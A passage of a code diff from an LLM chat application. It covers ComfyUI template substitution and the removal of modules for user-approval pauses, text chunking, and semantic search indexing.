rather than something guessed from node types -- sniffing for the first
`CLIPTextEncode` works on the shipped template and on nothing else, and gets
positive and negative the wrong way round the first time somebody reorders them.
**Substitution walks the parsed JSON, not the text of it.** A value that is
*exactly* `"{{steps}}"` is replaced by the number 20, not by the string "20";
ComfyUI validates types and refuses the second. A placeholder inside a longer
string still substitutes as text, which is what makes
`"{{prompt}}, masterpiece"` work. Doing it textually would also mean a prompt
containing a quotation mark produced a document that no longer parses, on the
one input guaranteed to contain arbitrary text.
The names are the tool's parameter names, so there is one vocabulary: what a
model may set, what the admin page documents and what a template may reference
cannot drift apart.
"""
from __future__ import annotations
import re
import secrets
from typing import Any
# Every hole a template may carry. A name outside this set is left alone, the
# same rule `prompts.substitute` follows -- a literal `{{x}}` is not a feature,
# but silently deleting one is worse than leaving it visible.
PLACEHOLDERS = (
"model",
"prompt",
"negative",
"seed",
"steps",
"cfg",
"width",
"height",
"sampler",
"scheduler",
"denoise",
# How many pictures one run produces. Late to the list, and the reason is
# worth stating: `batch_size` was a literal `1` in the base template, so an
# administrator whose card can comfortably make four at a time had no way of
# saying so short of editing the JSON. Not a tool parameter -- a model asking
# for six images because it is unsure is exactly the cost this should not
# invite -- so it fills from the instance default and nowhere else.
"batch",
)
# What a model may name. Everything else in `PLACEHOLDERS` fills from a default.
MODEL_SETTABLE = tuple(name for name in PLACEHOLDERS if name != "batch")
# The floor, taken from the base template. An instance's own defaults sit above
# this (see `resolve`), and this stays as the last resort so a fresh install
# behaves exactly as it always did.
#
# `seed` is deliberately absent: it has no fixed default, because one would make
# every generation that did not name a seed identical -- and would make the
# retry loop produce the same rejected image four times over.
DEFAULTS: dict[str, Any] = {
"negative": "text, watermark",
"steps": 20,
"cfg": 8.0,
"width": 512,
"height": 512,
"sampler": "euler",
"scheduler": "normal",
"denoise": 1.0,
"batch": 1,
}
# What each hole is for, and what it lands as. Read by the workflow editor, so
# somebody writing a template is told what `{{sampler}}` fills without reading
# this file -- and in particular is told the two names that do not match
# ComfyUI's own, which is the mistake that costs an afternoon.
DESCRIPTIONS: dict[str, tuple[str, str]] = {
"model": ("text", "The checkpoint. Fills ComfyUI's `ckpt_name`, not `model`."),
"prompt": ("text", "What to draw. The only value a model must supply."),
"negative": ("text", "What to keep out of the picture."),
"seed": ("number", "The noise seed. Absent or negative means a fresh random one."),
"steps": ("number", "How many denoising steps. More is slower, not always better."),
"cfg": ("number", "How closely to follow the prompt. A decimal."),
"width": ("number", "Pixels across. A multiple of 64."),
"height": ("number", "Pixels down. A multiple of 64."),
"sampler": ("text", "The sampling method. Fills ComfyUI's `sampler_name`, not `sampler`."),
"scheduler": ("text", "The noise schedule."),
"denoise": ("number", "How much of the latent to redraw. 1.0 for text-to-image."),
"batch": ("number", "How many images one run makes. Fills `batch_size`."),
}
# ComfyUI's own ranges, read off `/object_info`. Clamped rather than refused: a
# model that asks for 300 steps has misjudged rather than misbehaved, and one
# clarifying round to say so is worse than doing the sensible thing.
LIMITS: dict[str, tuple[float, float]] = {
"steps": (1, 150),
"cfg": (0.0, 30.0),
"width": (64, 2048),
"height": (64, 2048),
"denoise": (0.0, 1.0),
# Not ComfyUI's ceiling, which is 4096, but a sane one: this multiplies
# every generation's time and VRAM, and an administrator who wants more than
# eight at once wants a different workflow rather than a bigger number here.
"batch": (1, 8),
}
# ComfyUI's seed is a uint64. Generated here rather than left to the far side
# so the value can be reported back -- "it looked like this and here is how to
# get it again" is most of what a seed is for.
MAX_SEED = 2**64 - 1
_PLACEHOLDER = re.compile(r"\{\{\s*([a-z][a-z0-9_]*)\s*\}\}")
def random_seed() -> int:
return secrets.randbelow(MAX_SEED)
def instance_defaults(values: dict[str, Any] | None) -> dict[str, Any]:
"""The `default_*` keys out of the image settings, as placeholder names.
Only the ones actually set: an absent or empty key means "no opinion", and
must fall through to `DEFAULTS` rather than land as an empty string in a
workflow. That is the same reading `resolve` gives a model's own arguments,
and it is why an administrator can set two of these and leave the rest.
"""
out: dict[str, Any] = {}
for name in PLACEHOLDERS:
if name in ("prompt", "seed", "model"):
# A default prompt is not a thing; a default seed would make every
# picture identical; the checkpoint has its own setting and its own
# per-chat override, resolved before this is reached.
continue
value = (values or {}).get(f"default_{name}")
if value is None or value == "":
continue
out[name] = value
return out
def resolve(given: dict[str, Any], *, settings: dict[str, Any] | None = None) -> dict[str, Any]:
"""The full parameter set: what was asked for, over what this instance
prefers, over the built-in floor.
Three rungs, most specific winning, and the middle one is the new part. For
the whole life of this feature there were only two -- so 512x512, euler and
twenty steps were the values every instance got, whatever card it was
running on, and the only ways to move them were to bake literals into a
template instead of placeholders or to write prose in the instructions box
and hope. `DEFAULTS` stays underneath so an instance that sets nothing
behaves exactly as it did.
Absent and null are both "no opinion", at both levels. A model that emits
`"seed": null` rather than omitting the key is common enough that treating
it as a request for seed zero would be a bug nobody could see.
**A negative seed means random**, which is what `-1` means in ComfyUI's own
interface, in A1111, and in every other thing that has ever asked somebody
for a seed. A model that has read any of them will write it, and without
this it went through the uint64 wrap and came out as 18446744073709551615 --
a perfectly valid *fixed* seed, so "give me something new" produced the same
picture every time. Exactly the wrong answer, arrived at silently.
"""
values: dict[str, Any] = {**DEFAULTS, **instance_defaults(settings)}
for name, value in (given or {}).items():
# `batch` is absent from `MODEL_SETTABLE`, so a model naming it is
# ignored here rather than refused -- the tool schema never offered it,
# and one that invents the key has guessed rather than misbehaved.
if name in MODEL_SETTABLE and value is not None and value != "":
values[name] = value
seed = _whole(values.get("seed"), default=-1)
values["seed"] = random_seed() if seed < 0 else seed % (MAX_SEED + 1)
for name in ("steps", "width", "height", "batch"):
values[name] = _clamp(_whole(values.get(name), DEFAULTS[name]), name)
for name in ("cfg", "denoise"):
values[name] = _clamp(_decimal(values.get(name), DEFAULTS[name]), name)
for name in ("prompt", "negative", "sampler", "scheduler", "model"):
values[name] = str(values.get(name) or "")
return values
def _whole(value: Any, default: int) -> int:
try:
return int(float(value))
except (TypeError, ValueError):
return default
def _decimal(value: Any, default: float) -> float:
try:
return float(value)
except (TypeError, ValueError):
return default
def _clamp(value: Any, name: str) -> Any:
low, high = LIMITS.get(name, (None, None))
if low is None:
return value
clamped = min(max(value, low), high)
return int(clamped) if isinstance(value, int) else clamped
def fill(template: Any, values: dict[str, Any]) -> Any:
"""A copy of the template with its placeholders replaced.
Recursive over dicts and lists, because a workflow is nested and a
placeholder can be anywhere in it -- including inside a node's `_meta`,
which is harmless and should not be treated specially.
"""
if isinstance(template, dict):
return {key: fill(value, values) for key, value in template.items()}
if isinstance(template, list):
return [fill(item, values) for item in template]
if isinstance(template, str):
return _fill_string(template, values)
return template
def _fill_string(text: str, values: dict[str, Any]) -> Any:
"""One string, which may *become* a number.
The whole-value case is what keeps types right: `"{{steps}}"` is the number
and not a string that looks like one. Anything else is ordinary text
substitution, so `"{{prompt}}, masterpiece"` reads as a sentence.
"""
whole = _PLACEHOLDER.fullmatch(text.strip())
if whole is not None:
return values.get(whole.group(1), text)
def swap(match: re.Match[str]) -> str:
name = match.group(1)
return str(values[name]) if name in values else match.group(0)
return _PLACEHOLDER.sub(swap, text)
def placeholders_in(template: Any) -> set[str]:
"""Every `{{name}}` a template uses, for the admin page to report.
A template that mentions none of them is almost certainly a workflow pasted
straight out of ComfyUI without being parameterised, which would generate
the same picture whatever anybody typed. Worth saying at save time rather
than leaving somebody to discover it.
"""
found: set[str] = set()
if isinstance(template, dict):
for value in template.values():
found |= placeholders_in(value)
elif isinstance(template, list):
for item in template:
found |= placeholders_in(item)
elif isinstance(template, str):
found |= {match.group(1) for match in _PLACEHOLDER.finditer(template)}
return found
-272
View File
@@ -1,272 +0,0 @@
"""Pausing a reply to ask the person reading it something.
Three features turn out to be one mechanism. A command that needs approving, a
question the model wants answered, and "this reply is waiting for you" are all:
stop the generation, put an interactive block in the bubble, wait for a POST,
carry on. So there is one primitive, and approval is a shape of question rather
than a separate machine.
Two things about where it sits matter.
**It pauses a round, not a call.** A round's tool calls run together under a
semaphore, and parking four coroutines on four separate answers inside that
gather would queue them behind each other invisibly -- and the reader would get
four cards, answerable in any order, for commands whose order matters. So one
card describes everything in the round that needs a decision, and the calls that
survive it run concurrently exactly as they did before.
**Stop has to keep working.** `generation.cancel` is read in one place, between
streamed chunks, and there are no chunks while paused. Rather than a second
poller, `generation.request_stop` resolves the pause directly; see the comment
there. Nothing in this module reaches back into `services.generation`, which is
what keeps it testable on its own.
"""
from __future__ import annotations
import asyncio
import time
from dataclasses import dataclass, field
from typing import TYPE_CHECKING
if TYPE_CHECKING: # pragma: no cover - annotation only
from lembas.services.generation import Generation
KIND_APPROVAL = "approval"
KIND_QUESTION = "question"
# How a pause ended.
ALLOW = "allow"
ALLOW_ALWAYS = "allow_always"
DENY = "deny"
ANSWER = "answer"
CANCELLED = "cancelled" # Stop was pressed while the card was showing
EXPIRED = "expired" # nobody answered in time
# Outcomes that mean "go ahead".
PERMITTED = (ALLOW, ALLOW_ALWAYS)
# A card offering more than this many buttons is a card nobody reads.
MAX_OPTIONS = 6
# And more than this many questions at once is a form, not a conversation. A
# model that wants twenty answers should ask for four and then ask again with
# what it learned.
MAX_QUESTIONS = 8
# The value the "Something else" row submits. A sentinel rather than a real
# option, because it is the one choice on the card the model did not write: it
# is added by this code, always, to every question. That is the whole reason the
# model is told never to offer an "Other" of its own -- two of them is one that
# does nothing, and the model's version would have no box behind it.
OTHER = "__other__"
# How many characters of an option's description are kept. It is a sentence
# explaining a choice, not a paragraph, and it is model output landing in a
# card somebody is meant to read at a glance.
MAX_OPTION_CHARS = 240
# How much of a refusal's reason is carried back to the model. Generous, because
# this is the reader saying what they want instead and truncating that mid-clause
# is worse than the tokens it saves -- but bounded, because it lands in a tool
# result inside a request that already has a window to fit in.
MAX_REASON_CHARS = 2000
@dataclass(frozen=True)
class Option:
"""One answer offered for a question.
A `label` alone reads as a button; the optional `description` is what makes
a real choice possible -- "Rewrite it" and "Patch it" say nothing about
which loses your uncommitted work. Both are model output and are escaped
where they are shown.
"""
label: str
description: str = ""
@dataclass(frozen=True)
class Item:
"""One thing being asked about: a single question, or one command.
`index` is the position of the *call* in its round, so an answer can be
matched back to the call it belongs to -- the tool turns have to line up
with the assistant turn's `tool_calls`, or an endpoint pairs the wrong
result with the right id. Several items can share an index, because one
`ask_user` call may carry several questions.
`key` identifies this item within the card, and is what the form field is
named after. Stable and opaque: a question's own text would make a terrible
field name, and its position alone would collide across calls.
"""
index: int
key: str
kind: str
tool_name: str
title: str
detail: str = ""
reason: str = ""
# What the model says this call is for, in its own words -- distinct from
# `reason`, which is why *we* stopped ("Edit mode asks before anything that
# runs a command"). Model text, and shown as such: a card carrying an
# explanation somebody reads as the application's own would be a card
# vouching for it.
purpose: str = ""
options: tuple[Option, ...] = ()
# Whether more than one option may be chosen. The model says which, because
# only the model knows whether its options are alternatives ("rewrite or
# patch") or a set ("which of these to include"). Exclusive is the default:
# a radio group offered where checkboxes were meant costs one clarifying
# round, while checkboxes offered for alternatives invite an answer that
# contradicts itself.
multiple: bool = False
# Whether "Something else" is offered, with the box behind it. True for a
# question -- the options are the model's guess at the answers and it can be
# wrong -- and false for an approval, where the choice is Allow or Don't and
# a third way out would mean nothing.
allow_free_text: bool = True
# Whether `detail` can be corrected before this is allowed. Only where the
# detail *is* one argument and can be put back where it came from -- a tool
# with no entry in `tool_labels.DETAIL_KEYS` gets a `k=repr(v)` summary that
# cannot be parsed back, and offering a box that silently changed nothing
# would be worse than offering none.
editable: bool = False
@dataclass
class Interruption:
"""A reply, stopped, waiting for one answer to cover every item."""
id: str
items: tuple[Item, ...]
expires_at: float = 0.0
_future: asyncio.Future | None = field(default=None, repr=False, compare=False)
@property
def kind(self) -> str:
return KIND_QUESTION if any(i.kind == KIND_QUESTION for i in self.items) else KIND_APPROVAL
def resolve(
self, outcome: str, *, answers: dict[str, str] | None = None, reason: str = ""
) -> bool:
"""Complete this pause. Idempotent -- a second answer is ignored.
Returns whether this call was the one that answered it, which is what
the endpoint reports back: a card answered twice (two tabs, a double
click) should say so rather than pretend.
"""
if self._future is None or self._future.done():
return False
self._future.set_result(
Reply(
outcome=outcome,
answers=dict(answers or {}),
reason=reason.strip()[:MAX_REASON_CHARS],
)
)
return True
@dataclass(frozen=True)
class Reply:
"""How a card was answered.
`answers` is keyed by `Item.key`, so a card carrying four questions comes
back as four answers in one go. An approval carries none: the verdict is
the whole of it -- except for `reason`.
`reason` is why the reader refused, in their own words, and it belongs to
the *card* rather than to an item. The card already covers everything in the
round for the reason `interaction` opens with, one verdict answers the lot,
and somebody who says "not in that directory" is saying it about the round.
Keeping it off `answers` also keeps it clear of `text.<key>`, which on an
approval card already means something else entirely -- a corrected command.
"""
outcome: str
answers: dict[str, str] = field(default_factory=dict)
reason: str = ""
@property
def permitted(self) -> bool:
return self.outcome in PERMITTED
@property
def ended(self) -> bool:
"""Whether this outcome means the whole reply should stop."""
return self.outcome == CANCELLED
def answer_to(self, item: Item) -> str:
return (self.answers.get(item.key) or "").strip()
def build(
interaction_id: str, items: list[Item] | tuple[Item, ...], *, timeout: float
) -> Interruption:
"""An interruption with its future attached, ready to be waited on."""
return Interruption(
id=interaction_id,
items=tuple(items),
expires_at=time.monotonic() + timeout,
_future=asyncio.get_running_loop().create_future(),
)
async def wait_for(
generation: Generation, interruption: Interruption, *, timeout: float
) -> Reply:
"""Park the generation on this interruption until somebody answers.
Sets `generation.pending` and touches, so the follower sends the card on its
next frame; clears both in `finally`, so answering makes it disappear. The
time spent here accumulates on `generation.waited` and is taken off the
reply's wall-clock budget -- a reader who thinks for ten minutes about one
command should not thereby spend the whole allowance.
"""
generation.pending = interruption
generation.touch()
started = time.monotonic()
try:
return await asyncio.wait_for(asyncio.shield(interruption._future), timeout)
except TimeoutError:
return Reply(outcome=EXPIRED)
finally:
generation.waited += time.monotonic() - started
generation.pending = None
generation.touch()
def summarise(items: tuple[Item, ...]) -> str:
"""What to show in the status line while the card is up."""
if not items:
return ""
if items[0].kind == KIND_QUESTION:
return "Waiting for your answer…" if len(items) == 1 else "Waiting for your answers…"
if len(items) == 1:
return f"Waiting for you to allow {items[0].tool_name}"
return f"Waiting for you to allow {len(items)} actions…"
__all__ = [
"ALLOW",
"ALLOW_ALWAYS",
"ANSWER",
"CANCELLED",
"DENY",
"EXPIRED",
"KIND_APPROVAL",
"KIND_QUESTION",
"MAX_OPTIONS",
"MAX_QUESTIONS",
"MAX_REASON_CHARS",
"PERMITTED",
"Interruption",
"Item",
"Reply",
"build",
"summarise",
"wait_for",
]
-125
View File
@@ -1,125 +0,0 @@
"""Splitting a record into pieces small enough to embed, and packing vectors.
One implementation, used by documents, notes, skills and reports. Three would
drift, and drift here is invisible: a splitter that behaves differently for
notes than for documents produces a search that works and ranks wrongly.
## How it splits
On **paragraph boundaries first**, falling back to lines and then to a hard cut,
because a chunk that ends mid-sentence is one whose embedding is about half a
thought. The overlap carries the tail of the previous chunk into the next, so a
sentence that straddles a boundary is whole in one of them.
Characters rather than tokens throughout. The count has to be made without
asking the endpoint -- `services/tokens.py` already establishes four characters
to a token as this codebase's estimate, and being 20% out about a chunk size is
a slightly different chunk, not a wrong one.
## Packing
float32, little-endian. A 1024-dimension vector is 4KB packed and about 20KB as
JSON text, and every one of them is read on every semantic search.
"""
from __future__ import annotations
import hashlib
import struct
# Below this a piece is not worth a row: the embedding of six words is mostly
# noise, and a search that returns "and the following:" as its best hit is worse
# than one that returns nothing.
MIN_CHUNK_CHARS = 40
def split(text: str, *, size: int = 1200, overlap: int = 150) -> list[str]:
"""A record's text as pieces of roughly `size` characters.
`overlap` is how much of the previous piece rides along with the next. It is
clamped to half the size here as well as in the settings accessor, because
an overlap at or past the size means every piece starts where the last one
did and the loop never advances -- a hang rather than a bad index, so it is
refused in both places rather than in the more convenient one.
"""
body = (text or "").strip()
if not body:
return []
size = max(200, int(size))
overlap = max(0, min(int(overlap), size // 2))
if len(body) <= size:
return [body]
pieces: list[str] = []
start = 0
while start < len(body):
end = min(start + size, len(body))
if end < len(body):
end = _boundary(body, start, end)
piece = body[start:end].strip()
if len(piece) >= MIN_CHUNK_CHARS:
pieces.append(piece)
if end >= len(body):
break
start = max(end - overlap, start + 1)
return pieces
def _boundary(body: str, start: int, end: int) -> int:
"""Where to cut, preferring a paragraph break and then a line break.
Searched backwards from the hard limit, and only within the last third of
the piece: a paragraph break near the *start* would produce a chunk a
fraction of the size, which is how a long document turns into hundreds of
tiny rows that each match nothing.
"""
floor = start + (end - start) * 2 // 3
for marker in ("\n\n", "\n", ". "):
found = body.rfind(marker, floor, end)
if found > floor:
return found + len(marker)
return end
def digest(text: str) -> str:
"""A hash of what a chunk set was built from.
What makes re-indexing an unchanged record free, and what makes "is this
index current?" answerable without embedding anything. sha256 rather than
md5 for no reason beyond having no reason to prefer md5; both are being used
as a change detector rather than against an adversary.
"""
return hashlib.sha256((text or "").encode("utf-8")).hexdigest()
def pack(vector: list[float]) -> bytes:
return struct.pack(f"<{len(vector)}f", *vector)
def unpack(blob: bytes, dims: int) -> list[float]:
"""A stored vector, or an empty list if the row does not add up.
Length is checked against the declared width rather than inferred from it: a
truncated BLOB would otherwise unpack into a shorter vector and score
against a query happily, which is a wrong answer rather than a missing one.
"""
if dims <= 0 or len(blob) != dims * 4:
return []
return list(struct.unpack(f"<{dims}f", blob))
def dot(left: list[float], right: list[float]) -> float:
"""Cosine similarity, given that both sides are already unit vectors.
Normalisation happens once, at write time, in `llm/embeddings.py` -- so
every comparison here is a multiply-and-add rather than two square roots per
pair. A width mismatch scores zero rather than raising: it means the vectors
came from two different models, and the honest answer to "how similar are
these?" across two spaces is "this tells you nothing".
"""
if len(left) != len(right) or not left:
return 0.0
return sum(a * b for a, b in zip(left, right, strict=True))
__all__ = ["MIN_CHUNK_CHARS", "digest", "dot", "pack", "split", "unpack"]
+3 -59
View File
@@ -18,18 +18,11 @@ from sqlalchemy import select
from sqlalchemy.orm import Session as DBSession
from lembas.config import settings
from lembas.db.models import (
CHUNK_DOCUMENT,
SOURCE_LINK,
SOURCE_UPLOAD,
Document,
KnowledgeBase,
User,
)
from lembas.db.models import SOURCE_LINK, SOURCE_UPLOAD, Document, KnowledgeBase, User
from lembas.services import files as files_service
from lembas.services import sharing
from lembas.services.fetch import Fetched
from lembas.services.library import retrieval
from lembas.services.library.fts import search_ids
log = logging.getLogger(__name__)
@@ -261,47 +254,6 @@ def get(db: DBSession, document_id: str, user: User | None) -> Document | None:
return document
def can_write(document: Document, user: User | None) -> bool:
"""Whether this person may change a document's text.
Ownership, through the same helper every other library store uses. Sharing
grants **reading only**, so being able to see a document through somebody
else's base is never enough to rewrite it -- and reading is already settled
by `get`, which resolves visibility through the base.
Its own function rather than `sharing.can_write` at the call site because
`Document` is the one store whose visibility does not come from itself, and
a reader arriving at a bare `sharing.can_write(document, )` would have to
go and check whether that is the right question.
"""
return sharing.can_write(document, user)
def set_text(db: DBSession, document: Document, text: str) -> Document:
"""Replace the extracted text a person reads and a model searches.
The stored file is untouched: the bytes are the record, and this is what was
made of them. That is the same line PDF extraction draws -- extracted once
at upload, so a reply cannot change because a parser was upgraded -- and it
is why editing this is safe for transcripts: `files.copy_document` copies
the text when a document is attached, so an edit only changes what future
searches find.
`extraction_error` is cleared, because replacing a failed extraction by hand
is the main reason to want this at all; leaving the old apology beside the
new text would be the page contradicting itself.
The commit fires the `documents_fts` UPDATE trigger, so search stays correct
with nothing else to do. See `db/migrations.py:ensure_fts`.
"""
ceiling = files_service.limits().max_extracted_chars
document.extracted_text = text[:ceiling]
document.truncated = len(text) > ceiling
document.extraction_error = ""
db.commit()
return document
def search(
db: DBSession,
user: User | None,
@@ -309,22 +261,14 @@ def search(
*,
limit: int = 10,
base_ids: list[str] | None = None,
vector: list[float] | None = None,
) -> list[Document]:
"""Documents matching `needle` that this user may see, best match first.
The index is searched first and the visibility filter applied to the rows
it returned. That order matters: filtering afterwards is what makes it
impossible for a hit on somebody else's document to leak, even as a count.
`vector` is the query already embedded, or None. It comes from the caller
rather than being worked out here because this is synchronous and embedding
is an HTTP request -- see `services/library/retrieval.py`. None means the
keyword search exactly as it always was.
"""
hits = retrieval.search(
db, INDEX, needle, kind=CHUNK_DOCUMENT, vector=vector, limit=limit * 4
)
hits = search_ids(db, INDEX, needle, limit=limit * 4)
if not hits:
return []
-529
View File
@@ -1,529 +0,0 @@
"""Keeping the semantic index current, and rebuilding it when it is not.
## The shape, and why it is a background task
Embedding is an HTTP request. Every writer in the library -- `documents.create`,
`notes.edit`, `skills.save`, `reports.create` -- is synchronous and is called
from a route or a tool runner that has just committed a row, and none of them
should wait on a model server to answer before saying "saved".
So indexing is **fired and forgotten**: `schedule(kind, id)` starts a task and
returns immediately. A save that cannot be indexed is a save; the row is written
either way and the search falls back to keywords for that record until the next
rebuild. That is the whole degradation story, and it is the same one that covers
having no embedding model at all.
## Nothing is written when no model is chosen
`embedding_model_id` empty means the FTS path exactly as it has always been --
no chunk rows, no requests, no cost. That is what makes this safe to add to an
instance that never asked for it, and it is asserted rather than assumed.
## Staleness is a hash, not a timestamp
Every chunk carries `source_hash` (of the text it was built from), `model_id`
and `dims`. Re-indexing an unchanged record is free; a record whose text moved
is rebuilt; a record embedded by a *different* model is rebuilt on the next pass
and, until then, ignored by the scorer rather than trusted. Vectors from two
spaces score against each other perfectly happily and mean nothing, which is a
search that works and is wrong -- the worst failure this feature can have.
## The rebuild is restartable and reports itself
A half-finished index has to be usable rather than empty, so the rebuild walks
records one at a time and commits each. `progress()` is what the admin page
polls; it is in-process, because a rebuild does not survive a restart and
pretending otherwise would mean a progress bar that never moves.
"""
from __future__ import annotations
import asyncio
import contextlib
import logging
from dataclasses import dataclass, field
from sqlalchemy import delete, func, select
from sqlalchemy.orm import Session as DBSession
from lembas.db.models import (
CHUNK_DOCUMENT,
CHUNK_KINDS,
CHUNK_NOTE,
CHUNK_REPORT,
CHUNK_SKILL,
Chunk,
Connection,
Document,
Model,
Note,
Report,
Skill,
)
from lembas.db.session import session_scope
from lembas.services import settings_store
from lembas.services.library import chunks as chunk_service
from lembas.services.llm.openai_client import Endpoint, LLMError
log = logging.getLogger(__name__)
# What each kind is, and how to get its text. One table rather than four
# branches, for the reason `tool_labels` is one table: four copies of "which
# columns make up the searchable text" is three chances to disagree.
SOURCES: dict[str, tuple[type, tuple[str, ...]]] = {
CHUNK_DOCUMENT: (Document, ("title", "description", "extracted_text")),
CHUNK_NOTE: (Note, ("title", "body")),
CHUNK_SKILL: (Skill, ("name", "description", "body")),
CHUNK_REPORT: (Report, ("title", "summary", "body")),
}
# Tasks in flight, so a record saved twice in quick succession is indexed once
# more rather than twice at the same time. Keyed on kind and id.
_TASKS: dict[tuple[str, str], asyncio.Task] = {}
# --- What the model is ----------------------------------------------------------
@dataclass(frozen=True)
class Embedder:
"""Which model turns text into vectors, resolved while a session is open."""
endpoint: Endpoint
model_id: str
batch: int = 16
def embedder(db: DBSession) -> Embedder | None:
"""The configured embedding model, or None.
None is the answer to every "no" -- none chosen, the model row deleted, its
connection disabled -- and every caller reads it the same way: do nothing,
and let the keyword search stand. That is deliberately not an error. An
instance that never configured this is the common case, not a broken one.
"""
values = settings_store.extraction(db)
wanted = str(values.get("embedding_model_id") or "").strip()
if not wanted:
return None
model = db.scalar(
select(Model)
.join(Connection)
.where(
Model.model_id == wanted,
Model.enabled.is_(True),
Connection.enabled.is_(True),
)
.order_by(Connection.position)
)
if model is None:
log.info("embedding model %r is configured but not available", wanted)
return None
connection = db.get(Connection, model.connection_id)
if connection is None:
return None
return Embedder(
endpoint=Endpoint.from_connection(connection),
model_id=model.model_id,
batch=int(values.get("embed_batch") or 16),
)
def enabled(db: DBSession) -> bool:
return embedder(db) is not None
# --- Reading a record -----------------------------------------------------------
def text_of(row) -> str:
"""The searchable text of one record, in the same order the FTS index uses.
Blank fields are dropped rather than joined as empty lines, so a note with
no body hashes the same before and after somebody clears its body twice.
"""
kind = kind_of(row)
if kind is None:
return ""
_, columns = SOURCES[kind]
parts = [str(getattr(row, name, "") or "").strip() for name in columns]
return "\n\n".join(part for part in parts if part)
def kind_of(row) -> str | None:
for kind, (model, _) in SOURCES.items():
if isinstance(row, model):
return kind
return None
def owner_of(row) -> str:
return str(getattr(row, "owner_id", "") or "")
# --- Writing the index ----------------------------------------------------------
def forget_resource(db: DBSession, kind: str, resource_id: str) -> int:
"""Drop every chunk of one record. Called when it is deleted.
A plain DELETE rather than a cascade, because `resource_id` has no foreign
key -- it points at one of four tables depending on `resource_type`, which
SQLite cannot express. Same reasoning as `Share.principal_id`.
"""
result = db.execute(
delete(Chunk).where(Chunk.resource_type == kind, Chunk.resource_id == resource_id)
)
db.commit()
return int(result.rowcount or 0)
def current_hash(db: DBSession, kind: str, resource_id: str) -> tuple[str, str]:
"""The hash and model of the chunks already stored for a record."""
row = db.execute(
select(Chunk.source_hash, Chunk.model_id)
.where(Chunk.resource_type == kind, Chunk.resource_id == resource_id)
.limit(1)
).first()
return (str(row[0] or ""), str(row[1] or "")) if row else ("", "")
async def index_resource(kind: str, resource_id: str, *, force: bool = False) -> int:
"""Rebuild one record's chunks. Returns how many were written.
Opens its own session, for the reason every background worker here does: it
outlives the request that scheduled it. Never raises -- a failure leaves the
old chunks in place, which is a slightly stale index rather than a hole, and
is strictly better than deleting first and failing to write.
"""
if kind not in SOURCES:
return 0
try:
with session_scope() as db:
model, _ = SOURCES[kind]
row = db.get(model, resource_id)
if row is None:
forget_resource(db, kind, resource_id)
return 0
worker = embedder(db)
if worker is None:
return 0
body = text_of(row)
owner = owner_of(row)
values = settings_store.extraction(db)
digest = chunk_service.digest(body)
stored_hash, stored_model = current_hash(db, kind, resource_id)
if not body.strip():
with session_scope() as db:
forget_resource(db, kind, resource_id)
return 0
if not force and digest == stored_hash and stored_model == worker.model_id:
return 0
pieces = chunk_service.split(
body, size=int(values["chunk_chars"]), overlap=int(values["chunk_overlap"])
)
if not pieces:
with session_scope() as db:
forget_resource(db, kind, resource_id)
return 0
vectors = await _embed_all(worker, pieces)
# Written only once every vector is in hand. Deleting first and failing
# half way through would leave a record indexed by half of itself, which
# ranks worse than not being indexed at all and looks like nothing.
with session_scope() as db:
db.execute(
delete(Chunk).where(
Chunk.resource_type == kind, Chunk.resource_id == resource_id
)
)
for ordinal, (piece, vector) in enumerate(zip(pieces, vectors, strict=True)):
db.add(
Chunk(
owner_id=owner,
resource_type=kind,
resource_id=resource_id,
ordinal=ordinal,
text=piece,
vector=chunk_service.pack(vector),
dims=len(vector),
model_id=worker.model_id,
source_hash=digest,
)
)
db.commit()
return len(pieces)
except LLMError as exc:
log.info("could not index %s %s: %s", kind, resource_id, exc)
return 0
except asyncio.CancelledError:
raise
except Exception: # noqa: BLE001 - one bad record must not stop a rebuild
log.exception("indexing %s %s failed", kind, resource_id)
return 0
async def _embed_all(worker: Embedder, pieces: list[str]) -> list[list[float]]:
from lembas.services.llm import embeddings as embeddings_service
vectors: list[list[float]] = []
for start in range(0, len(pieces), worker.batch):
batch = pieces[start : start + worker.batch]
vectors.extend(await embeddings_service.embed(worker.endpoint, worker.model_id, batch))
return vectors
# --- Scheduling -----------------------------------------------------------------
def schedule(kind: str, resource_id: str) -> None:
"""Index a record soon, without making its writer wait.
Called from synchronous writers that have just committed. Two things it is
careful about:
- **No running loop means do nothing.** A CLI command, a test, or the
startup sweep has no event loop to attach to, and building a coroutine
there produces "never awaited" at the caller's own line. The check is
before the coroutine, the same trap `push.announce_later` documents.
- **A record already being indexed is left alone.** Saving twice in a second
would otherwise embed the same text twice at once; the second call is
dropped and the record is picked up by the *next* save or rebuild, which
is why `index_resource` re-reads the row rather than taking text passed in.
"""
if kind not in SOURCES or not resource_id:
return
try:
asyncio.get_running_loop()
except RuntimeError:
return
key = (kind, resource_id)
existing = _TASKS.get(key)
if existing is not None and not existing.done():
return
task = asyncio.create_task(index_resource(kind, resource_id))
_TASKS[key] = task
task.add_done_callback(lambda _t, k=key: _TASKS.pop(k, None))
def schedule_for(row) -> None:
"""The same, given a record rather than its kind and id."""
kind = kind_of(row)
if kind is not None:
schedule(kind, str(getattr(row, "id", "") or ""))
# --- Noticing a change ----------------------------------------------------------
# Two SQLAlchemy session events rather than a call in each of the ten writers
# that touch these four tables. That is a departure from this codebase's taste
# for explicit seams, and the reason is the one `tool_label` gives for being a
# Jinja global: a step every writer has to remember is a step one of them will
# forget, and here forgetting is *silent* -- the record saves, the keyword search
# still finds it, and only its semantic recall is quietly stale.
#
# `after_flush` collects and `after_commit` acts, in that order and never
# merged. Inside a flush the transaction has not landed yet, so a task started
# there could read the row before it exists; and `session.deleted` is empty by
# the time the commit fires, so the collecting has to happen while it is not.
_PENDING = "lembas_index_pending"
def _collect(session, _flush_context) -> None:
seen: set[tuple[str, str]] = session.info.setdefault(_PENDING, set())
for row in (*session.new, *session.dirty, *session.deleted):
kind = kind_of(row)
if kind is None:
continue
resource_id = str(getattr(row, "id", "") or "")
if resource_id:
seen.add((kind, resource_id))
def _fire(session) -> None:
# A deletion is scheduled exactly like a change: `index_resource` finds no
# row and drops the chunks. One path rather than two, and the one that runs
# is the one that has to be right anyway.
for kind, resource_id in session.info.pop(_PENDING, set()):
schedule(kind, resource_id)
def _forget(session) -> None:
session.info.pop(_PENDING, None)
def install() -> None:
"""Listen for library records changing. Called once, from the app factory.
Idempotent: `event.contains` is checked, because the app factory is called
per test in the suite and registering the same listener a hundred times
would index every record a hundred times over.
"""
from sqlalchemy import event
from sqlalchemy.orm import Session
for name, handler in (
("after_flush", _collect),
("after_commit", _fire),
("after_rollback", _forget),
):
if not event.contains(Session, name, handler):
event.listen(Session, name, handler)
def sweep_orphans(db: DBSession) -> int:
"""Drop chunks whose record has gone.
